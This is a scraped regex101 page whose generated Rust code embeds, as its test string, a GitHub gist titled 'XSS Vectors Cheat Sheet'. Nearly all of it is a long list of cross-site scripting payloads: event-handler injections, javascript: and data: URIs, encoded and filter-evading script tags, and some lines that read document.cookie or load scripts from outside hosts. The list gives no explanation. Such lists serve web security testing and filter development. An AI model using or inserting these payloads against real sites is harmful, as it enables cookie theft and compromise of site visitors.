Regular Expressions 101

Save & Share

Regex Version: ver. 2
Update Regex
ctrl+⇧+s
Save new Regex
ctrl+s
Add to Community Library
Flavor

PCRE2 (PHP >=7.3)
PCRE (PHP <7.3)
ECMAScript (JavaScript)
Python
Golang
Java 8
.NET 7.0 (C#)
Rust
Regex Flavor Guide
Function

Match
Substitution
List
Unit Tests
Tools

Code Generator
Regex Debugger
Export Matches
Benchmark Regex
Regular Expression
No Match

Test String

Code Generator

Language

Generated Code

// include the latest version of the regex crate in your Cargo.toml
extern crate regex;

use regex::Regex;

fn main() {
  let regex = Regex::new(r"(?m)((\%3C)|<)((\%2F)|\/)*([^\/b\na@>][^b][^>]*|b[^>]+|a[^>]+)((\%3E)|>)").unwrap();
  let string = "Skip to content
 
Search…
All gists
Back to GitHub
Sign in
Sign up
Instantly share code, notes, and snippets.

@kurobeats kurobeats/xss_vectors.txt
Last active 2 days ago
18178
 Code Revisions 2 Stars 180 Forks 78
<script src=\"https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45.js\"></script>

<div/onmouseover='alert(1)'> style=\"x:\">
<--`<img/src=` onerror=alert(1)> --!>

XSS Vectors Cheat Sheet
 xss_vectors.txt
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onafterprint=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onbeforeprint=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onbeforeunload=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onerror=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onhashchange=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onload=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onmessage=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ononline=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onoffline=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onpagehide=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onpageshow=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onpopstate=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onresize=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onstorage=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onunload=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onblur=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onchange=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oncontextmenu=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oninput=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oninvalid=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onreset=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onsearch=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onselect=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onsubmit=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onkeydown=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onkeypress=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onkeyup=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onclick=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondblclick=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onmousedown=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onmousemove=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onmouseout=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onmouseover=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onmouseup=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onmousewheel=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onwheel=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondrag=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondragend=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondragenter=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondragleave=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondragover=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondragstart=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondrop=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onscroll=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oncopy=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oncut=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onpaste=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onabort=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oncanplay=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oncanplaythrough=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x oncuechange=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ondurationchange=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onemptied=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onended=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onerror=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onloadeddata=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onloadedmetadata=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onloadstart=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onpause=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onplay=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onplaying=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onprogress=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onratechange=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onseeked=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onseeking=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onstalled=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onsuspend=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ontimeupdate=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onvolumechange=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onwaiting=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x onshow=\"alert(String.fromCharCode(88,83,83))\">
<IMG SRC=x ontoggle=\"alert(String.fromCharCode(88,83,83))\">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=\"alert(1)\";
<IMG SRC=x onload=\"alert(String.fromCharCode(88,83,83))\">
<INPUT TYPE=\"BUTTON\" action=\"alert('XSS')\"/>
\"><h1><IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\">123</h1>
\"><h1><IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>
\"><h1><IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>
\"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=\"0%EF%BB%BF
\"><h1><IFRAME width=\"420\" height=\"315\" SRC=\"http://www.youtube.com/embed/sxvccpasgTE\" frameborder=\"0\" onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>
\"><h1><iframe width=\"420\" height=\"315\" src=\"http://www.youtube.com/embed/sxvccpasgTE\" frameborder=\"0\" allowfullscreen></iframe>123</h1>
><h1><IFRAME width=\"420\" height=\"315\" frameborder=\"0\" onmouseover=\"document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
g'\"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
<IFRAME width=\"420\" height=\"315\" frameborder=\"0\" onload=\"alert(document.cookie)\"></IFRAME>
\"><h1><IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\">123</h1>
\"><h1><IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>
<iframe src=http://xss.rocks/scriptlet.html <
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>
<iframe  src=\"&Tab;javascript:prompt(1)&Tab;\">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<img/src=`` onerror=this.onerror=confirm(1) 
<form><isindex formaction=\"javascript&colon;confirm(1)\"
<img src=``&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">
<script /**/>/**/alert(1)/**/</script /**/
&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>
<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">
<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X</script><img/*/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/*/onerror='eval(src)'>
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(1)\"&#11;&#10;&#09;;>
<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a
http://www.google<script .com>alert(document.location)</script
<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a
<img/src=@&#32;&#13; onerror = prompt('&#49;')
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
&#00;</form><input type&#61;\"date\" onfocus=\"alert(1)\">
<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>
<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style=\"width:expression(confirm(1))\">X</div> {IE7}
<iframe// src=javaSCRIPT&colon;alert(1)
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>
//|\\\\ <script //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\\\ </script //|\\\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">
</plaintext\\></|\\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">
<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>
<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">
<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">
<var onmouseover=\"prompt(1)\">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">
<%<!--'%><script>alert(1);</script -->
<script src=\"data:text/javascript,alert(1)\"></script>
<iframe/src \\/\\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type=\"text\" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>
<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>
<math><a xlink:href=\"//jsfiddle.net/t846h/\">click
<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a
<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>
<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+
<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F
<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\\/onerror = alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style=\"x:\">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>
\"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<math><a xlink:href=\"//jsfiddle.net/t846h/\">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>
<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>
<script\\x20type=\"text/javascript\">javascript:alert(1);</script>
<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>
<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>
<script\\x09type=\"text/javascript\">javascript:alert(1);</script>
<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>
<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>
<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>
'`\"><\\x3Cscript>javascript:alert(1)</script>        
'`\"><\\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror=\"javascript:alert(1)\"></img>
<audio src=1 href=1 onerror=\"javascript:alert(1)\"></audio>
<video src=1 href=1 onerror=\"javascript:alert(1)\"></video>
<body src=1 href=1 onerror=\"javascript:alert(1)\"></body>
<image src=1 href=1 onerror=\"javascript:alert(1)\"></image>
<object src=1 href=1 onerror=\"javascript:alert(1)\"></object>
<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>
<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>
<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"></title onPropertyChange>
<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"></iframe onLoad>
<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"></body onMouseEnter>
<body onFocus body onFocus=\"javascript:javascript:alert(1)\"></body onFocus>
<frameset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"></script onReadyStateChange>
<html onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"></html onMouseUp>
<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"></body onPropertyChange>
<svg onLoad svg onLoad=\"javascript:javascript:alert(1)\"></svg onLoad>
<body onPageHide body onPageHide=\"javascript:javascript:alert(1)\"></body onPageHide>
<body onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"></body onMouseOver>
<body onUnload body onUnload=\"javascript:javascript:alert(1)\"></body onUnload>
<body onLoad body onLoad=\"javascript:javascript:alert(1)\"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"></html onMouseLeave>
<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"></html onMouseWheel>
<style onLoad style onLoad=\"javascript:javascript:alert(1)\"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"></iframe onReadyStateChange>
<body onPageShow body onPageShow=\"javascript:javascript:alert(1)\"></body onPageShow>
<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"></style onReadyStateChange>
<frameset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"></frameset onFocus>
<applet onError applet onError=\"javascript:javascript:alert(1)\"></applet onError>
<marquee onStart marquee onStart=\"javascript:javascript:alert(1)\"></marquee onStart>
<script onLoad script onLoad=\"javascript:javascript:alert(1)\"></script onLoad>
<html onMouseOver html onMouseOver=\"javascript:javascript:alert(1)\"></html onMouseOver>
<html onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(1)\"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1)\"></body onBeforeUnload>
<html onMouseDown html onMouseDown=\"javascript:javascript:alert(1)\"></html onMouseDown>
<marquee onScroll marquee onScroll=\"javascript:javascript:alert(1)\"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(1)\"></xml onPropertyChange>
<frameset onBlur frameset onBlur=\"javascript:javascript:alert(1)\"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1)\"></applet onReadyStateChange>
<svg onUnload svg onUnload=\"javascript:javascript:alert(1)\"></svg onUnload>
<html onMouseOut html onMouseOut=\"javascript:javascript:alert(1)\"></html onMouseOut>
<body onMouseMove body onMouseMove=\"javascript:javascript:alert(1)\"></body onMouseMove>
<body onResize body onResize=\"javascript:javascript:alert(1)\"></body onResize>
<object onError object onError=\"javascript:javascript:alert(1)\"></object onError>
<body onPopState body onPopState=\"javascript:javascript:alert(1)\"></body onPopState>
<html onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(1)\"></applet onreadystatechange>
<body onpagehide body onpagehide=\"javascript:javascript:alert(1)\"></body onpagehide>
<svg onunload svg onunload=\"javascript:javascript:alert(1)\"></svg onunload>
<applet onerror applet onerror=\"javascript:javascript:alert(1)\"></applet onerror>
<body onkeyup body onkeyup=\"javascript:javascript:alert(1)\"></body onkeyup>
<body onunload body onunload=\"javascript:javascript:alert(1)\"></body onunload>
<iframe onload iframe onload=\"javascript:javascript:alert(1)\"></iframe onload>
<body onload body onload=\"javascript:javascript:alert(1)\"></body onload>
<html onmouseover html onmouseover=\"javascript:javascript:alert(1)\"></html onmouseover>
<object onbeforeload object onbeforeload=\"javascript:javascript:alert(1)\"></object onbeforeload>
<body onbeforeunload body onbeforeunload=\"javascript:javascript:alert(1)\"></body onbeforeunload>
<body onfocus body onfocus=\"javascript:javascript:alert(1)\"></body onfocus>
<body onkeydown body onkeydown=\"javascript:javascript:alert(1)\"></body onkeydown>
<iframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(1)\"></iframe onbeforeload>
<iframe src iframe src=\"javascript:javascript:alert(1)\"></iframe src>
<svg onload svg onload=\"javascript:javascript:alert(1)\"></svg onload>
<html onmousemove html onmousemove=\"javascript:javascript:alert(1)\"></html onmousemove>
<body onblur body onblur=\"javascript:javascript:alert(1)\"></body onblur>
\\x3Cscript>javascript:alert(1)</script>
'\"`><script>/* *\\x2Fjavascript:alert(1)// */</script>
<script>javascript:alert(1)</script\\x0D
<script>javascript:alert(1)</script\\x0A
<script>javascript:alert(1)</script\\x0B
<script charset=\"\\x22>javascript:alert(1)</script>
<!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
`\"'><img src='#\\x27 onerror=javascript:alert(1)>
<a href=\"javascript\\x3Ajavascript:alert(1)\" id=\"fuzzelement1\">test</a>
\"'`><p><svg><script>a='hello\\x27;javascript:alert(1)//';</script></p>
<a href=\"javas\\x00cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x07cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x0Dcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x0Acript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x08cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x02cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x03cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x04cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x01cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x05cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x0Bcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x09cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x06cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javas\\x0Ccript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<script>/* *\\x2A/javascript:alert(1)// */</script>
<script>/* *\\x00/javascript:alert(1)// */</script>
<style></style\\x3E<img src=\"about:blank\" onerror=javascript:alert(1)//></style>
<style></style\\x0D<img src=\"about:blank\" onerror=javascript:alert(1)//></style>
<style></style\\x09<img src=\"about:blank\" onerror=javascript:alert(1)//></style>
<style></style\\x20<img src=\"about:blank\" onerror=javascript:alert(1)//></style>
<style></style\\x0A<img src=\"about:blank\" onerror=javascript:alert(1)//></style>
\"'`>ABC<div style=\"font-family:'foo'\\x7Dx:expression(javascript:alert(1);/*';\">DEF 
\"'`>ABC<div style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(1);/*';\">DEF 
<script>if(\"x\\\\xE1\\x96\\x89\".length==2) { javascript:alert(1);}</script>
<script>if(\"x\\\\xE0\\xB9\\x92\".length==2) { javascript:alert(1);}</script>
<script>if(\"x\\\\xEE\\xA9\\x93\".length==2) { javascript:alert(1);}</script>
'`\"><\\x3Cscript>javascript:alert(1)</script>
'`\"><\\x00script>javascript:alert(1)</script>
\"'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>
\"'`><\\x00img src=xxx:x onerror=javascript:alert(1)>
<script src=\"data:text/plain\\x2Cjavascript:alert(1)\"></script>
<script src=\"data:\\xD4\\x8F,javascript:alert(1)\"></script>
<script src=\"data:\\xE0\\xA4\\x98,javascript:alert(1)\"></script>
<script src=\"data:\\xCB\\x8F,javascript:alert(1)\"></script>
<script\\x20type=\"text/javascript\">javascript:alert(1);</script>
<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>
<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>
<script\\x09type=\"text/javascript\">javascript:alert(1);</script>
<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>
<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>
<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>
ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF
ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF
ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF
ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF
